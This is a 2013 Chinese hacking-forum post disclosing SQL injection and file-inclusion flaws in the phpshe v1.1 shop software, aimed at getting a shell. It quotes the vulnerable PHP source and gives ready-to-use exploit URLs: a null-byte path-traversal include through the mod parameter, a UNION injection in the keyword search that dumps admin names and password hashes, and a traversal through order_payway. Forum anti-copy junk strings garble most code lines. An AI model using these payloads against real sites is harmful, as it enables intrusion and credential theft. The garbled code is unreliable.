找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2311|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/
; {. {3 Q% a2 U& }3 C9 z( R* \/* Phpshe v1.1 Vulnerability5 m5 i: V3 y5 X* h
/* ========================
5 E5 \0 g% S3 U  ~: x/* By: : Kn1f36 E3 z# `, r# z5 m, R
/* E-Mail : 681796@qq.com
! ]+ N9 k5 G$ C5 M5 ?/*******************************************************/- S( R. `$ n5 I( c( f& h) O+ E
0×00 整体大概参数传输
9 Q4 g$ [2 M  g) @0 L' _, {6 Y5 g9 B
, f+ {: ]% i! i) p0 o# m7 s! C3 ?7 ~, U; ^* s1 |

6 ^4 x2 W7 U1 _- ^& J//common.php: |5 D( ?6 m' Z" Z! u3 V& u
if (get_magic_quotes_gpc()) {/ N1 f- K7 f& @7 y- Y
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');( e# Y# N3 n$ x6 F/ o' F
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
' O: q' t/ \) K& ^2 D}
: a7 \/ v# z8 Z6 h% Velse {* P* l) Y! k7 r
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
, I/ c" K' e/ x9 N4 Y$ W( T0 b0 U!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');/ G! [; I. p2 N, T3 c% r  \
}
4 w( q6 c+ M/ D# x1 }session_start();
6 E* r0 [: e" ^!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
: _) ~7 d0 x% b0 a!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');$ _/ H; V9 R7 y% Z% n+ |( w: C
( n& p0 c% A" H$ Z: A# @" f
0×01 包含漏洞* ^0 x' U* T' ^3 f5 }# k$ b
( I/ l: h$ {: @7 s/ k
; B1 v" f  I7 K6 w- \
//首页文件
& N8 R% f+ O) Z' L5 o' v2 q4 n<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
+ m. u% Q: A1 T. S2 m4 p9 Binclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞  u' Z2 n0 h3 q% i
pe_result();
) ~( v: m- j  S2 A3 F?>
0 l0 c2 b8 E! q% h5 @) a//common 文件 第15行开始
7 q  b" {8 v' _9 n* T3 Yurl路由配置4 p6 s& Z: V* w8 N3 ]5 N  @8 D2 O
$module = $mod = $act = 'index';
7 w6 R* o# y1 Q1 h- A$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
9 k1 `6 [( v' N5 Y$ c0 H* r$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
1 Q, Z7 l5 l# z/ F" f! f$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);/ u' Q( ]2 |# S5 X) Y
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00( n. g6 K7 @# `% G0 p4 }' {! P


& Q' C9 X! f& X9 V5 \
) T. b. m, d; M  M% o) d7 j: }5 k8 _7 w 0×02 搜索注入) W  c( M) D% ]  a4 X0 Y
9 {" Q4 R6 u% z! T
<code id="code2">

//product.php文件4 T5 ?9 E  u' ]0 v
case 'list':6 l- A8 C$ R* A, Y6 D
$category_id = intval($id);
) W6 t( [' H- a/ y/ A: N0 i5 G+ N% J; r$info = $db->pe_select('category', array('category_id'=>$category_id));
4 A6 N* l7 B2 s8 ?0 Y% R* j//搜索! V3 O* m& u' @& ?: ~: B9 d
$sqlwhere = " and `product_state` = 1";' o, [3 E, u+ _
pe_lead('hook/category.hook.php');
! }' J! E) k7 D2 Y* Z) h( @; V$ xif ($category_id) {
4 S# S) @( ^0 C8 c+ ?' rwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";8 Q6 V! r$ N9 u/ z# S+ n* }
}
# m3 E* e* o4 \, F& o' s$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
- N! Z6 O6 O$ E. y) e/ U& {if ($_g_orderby) {$ J; a+ H- _2 ~
$orderby = explode('_', $_g_orderby);
; c6 ?- P8 Z9 P1 [2 ~  P* G& B1 `; @$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";+ u7 S% `7 `* y3 i. |& ^- u. A
}
6 Z$ t9 U  f7 [9 Q- A) N- q8 Q( Uelse {
  M  y' J+ ^5 x/ h$sqlwhere .= " order by `product_id` desc";! q: q* r: V8 ^9 }
}
! I/ Y5 j/ ]( s4 D% A% h- X( k$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
/ A0 F2 u0 g- B3 J//热卖排行
9 K9 \; B2 _8 k+ Y9 g$ Q1 @7 U$product_hotlist = product_hotlist();
9 T) f9 ?& x% V7 N2 F+ N//当前路径5 l* a8 ~& M8 E  y7 h7 x
$nowpath = category_path($category_id);3 [4 k, M6 }. W# Q
$seo = pe_seo($info['category_name']);+ N' n0 {. t/ e' U1 E
include(pe_tpl('product_list.html'));5 V* o$ Y/ r3 }6 X
//跟进selectall函数库
/ h) s# P) q1 [9 j, f5 H$ Kpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
/ x2 C4 r: u8 h3 |9 `{
2 d( N9 Z# P9 v8 O' P( }//处理条件语句/ I$ _% P$ F* N' g8 D# f* C
$sqlwhere = $this->_dowhere($where);
; y0 N* s' C: D4 f% y" \$ [8 B/ Ereturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
* E+ d2 O; e' r$ x+ j}+ J4 }5 R4 Y0 n1 @& t
//exp$ |! n, o- B! k4 X* }
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
. Z. }" X. f$ p' }

</code>
% F! _; A3 S: y7 s1 T. ]
' F- j. M  R7 n$ G" D0×03 包含漏洞2
& M# P, P5 \) w7 |* C( g2 Z
+ n0 O( Z5 Y6 O* P<code id="code3">

//order.php

case 'pay':

/ Y1 ~3 p/ |* \: O" P8 Z0 c5 c. j
$order_id = pe_dbhold($_g_id);

6 w- }; i; c4 I/ y3 b5 R
$cache_payway = cache::get('payway');

. b  _6 D' N# ^
foreach($cache_payway as $k => $v) {

/ K7 z# _+ n9 M  q) w. L- A, X
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

4 D. Z& J. b/ D1 P- s  t* `2 M
if ($k == 'bank') {

3 V$ e5 {% u: U) A) y( m
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

; ?6 Z6 y2 A3 T3 y% o' H
}


5 B4 M, H. ^: u8 h8 \! T0 _3 u}

) `# W+ f" |3 r( E' ?
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


$ ^- S  K0 p3 c2 E) h& j+ `; F% X!$order['order_id'] && pe_error('订单号错误...');

* r$ o7 L* B& c- X& m4 w2 B
if (isset($_p_pesubmit)) {

  c5 ^) B/ ^4 U& ?
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


0 t% S6 z' a$ z" g. F/ }$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

& W/ X. _/ P9 _: h" O0 L
foreach ($info_list as $v) {

2 Z8 }, y8 P& _. ~" X. S7 @8 h& X
$order['order_name'] .= "{$v['product_name']};";
' \/ ?) _6 N7 I. R$ f5 @2 l


$ V, T0 r/ @& V7 {5 J6 [  L+ ~5 {}

- @& {! s$ e! S
echo '正在为您连接支付网站,请稍后...';

! |2 n3 c! g; N5 ^' Z, R0 Q' n$ @
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

- i0 K( I" t$ o# }) P
}//当一切准备好的时候就可以进行"鸡肋包含了"

" O6 a- v" J* L
else {

0 R: h4 {, `4 L; V6 J. e- k
pe_error('支付错误...');


" r  A0 t  t" T  X' U4 \# `; j}

. O& C1 E; q% S% ]0 d. z5 d6 J. N, F
}

+ y4 Q+ i* q; q6 K& [+ Q; p
$seo = pe_seo('选择支付方式');


8 z! w1 Y6 y& B- oinclude(pe_tpl('order_pay.html'));


  N- b6 c" R. R8 r5 m& dbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
8 \) Y6 ]# }0 C" e8 r

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表